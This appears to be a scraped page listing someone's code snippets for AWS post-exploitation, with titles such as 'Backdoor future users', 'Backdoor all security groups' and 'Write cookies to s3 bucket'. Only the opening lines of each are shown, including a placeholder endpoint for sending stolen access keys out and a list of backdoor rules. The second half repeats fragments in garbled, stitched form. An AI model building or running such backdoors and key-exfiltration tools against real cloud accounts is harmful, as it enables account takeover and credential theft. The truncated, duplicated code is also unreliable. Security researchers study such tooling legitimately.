Daniel Grzelak dagrz

## S3 bucket put notification configuration
{
  "LambdaFunctionConfigurations": [
    {
      "LambdaFunctionArn": "arn:aws:lambda:[my-region]:[account-id]:function:[my-function]",
      "Id": "[my-guid]",
      "Events": [
        "s3:ObjectCreated:*"
      ]
    }
  ]

## s3 bucket delete lifecycle configuration
{
  "Rules": [
    {
      "Status": "Enabled",
      "Prefix": "",
      "Expiration": {
        "Days": 1
      },
      "ID": "Rule for the Entire Bucket"
    }

## AWS cli proxy Lambda function
#!/usr/bin/env python

from __future__ import print_function
import awscli
import awscli.clidriver
from cStringIO import StringIO
import sys
import json


## AWS Lambda user rabbit
#!/usr/bin/env python

from __future__ import print_function
import json
import boto3
import random
import re
import string

def lambda_handler(event, context):

## Backdoor future users in AWS account
#!/usr/bin/env python
from __future__ import print_function
import json
import boto3
from botocore.exceptions import ClientError
import requests

# An endpoint to send access keys to, e.g. http://requestb.in/
POST_URL = 'https://...'

## Backdoor future roles in AWS account
#!/usr/bin/env python
from __future__ import print_function
import json
import boto3
from botocore.exceptions import ClientError
import requests
import random

# An endpoint to send access keys to, e.g. http://requestb.in/
POST_URL = 'https://...'

## Backdoor all users in AWS account
#!/usr/bin/env python
from __future__ import print_function
import boto3
from botocore.exceptions import ClientError
import json


def main(args):
    backdoor_users(get_users())

## Write cookies to s3 bucket
<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
</head>
<body>
  <script>
   $(document).ready(function(){
    $.ajax({
        type: 'PUT',
        headers: {'x-amz-acl': 'bucket-owner-full-control'},

## Backdoor all security groups in AWS account
#!/usr/bin/env python
from __future__ import print_function
import boto3
from botocore.exceptions import ClientError
import json
import random


# A list of rules to add at random to security groups.
BACKDOOR_RULES = [

## Validate access keys
#!/usr/bin/env python
from __future__ import print_function
import boto3
from botocore.exceptions import ClientError
import json
import argparse


def main(args):
    for line in args.key_file.readlines():
	{
	"LambdaFunctionConfigurations": [
	{
	"LambdaFunctionArn": "arn:aws:lambda:[my-region]:[account-id]:function:[my-function]",
	"Id": "[my-guid]",
	"Events": [
	"s3:ObjectCreated:*"
	]
	}
	]
	#!/usr/bin/env python

	from __future__ import print_function
	import awscli
	import awscli.clidriver
	from cStringIO import StringIO
	import sys
	import json
	#!/usr/bin/env python
	from __future__ import print_function
	import boto3
	from botocore.exceptions import ClientError
	import json


	def main(args):
	backdoor_users(get_users())
	<html>
	<head>
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
	</head>
	<body>
	<script>
	$(document).ready(function(){
	$.ajax({
	type: 'PUT',
	headers: {'x-amz-acl': 'bucket-owner-full-control'},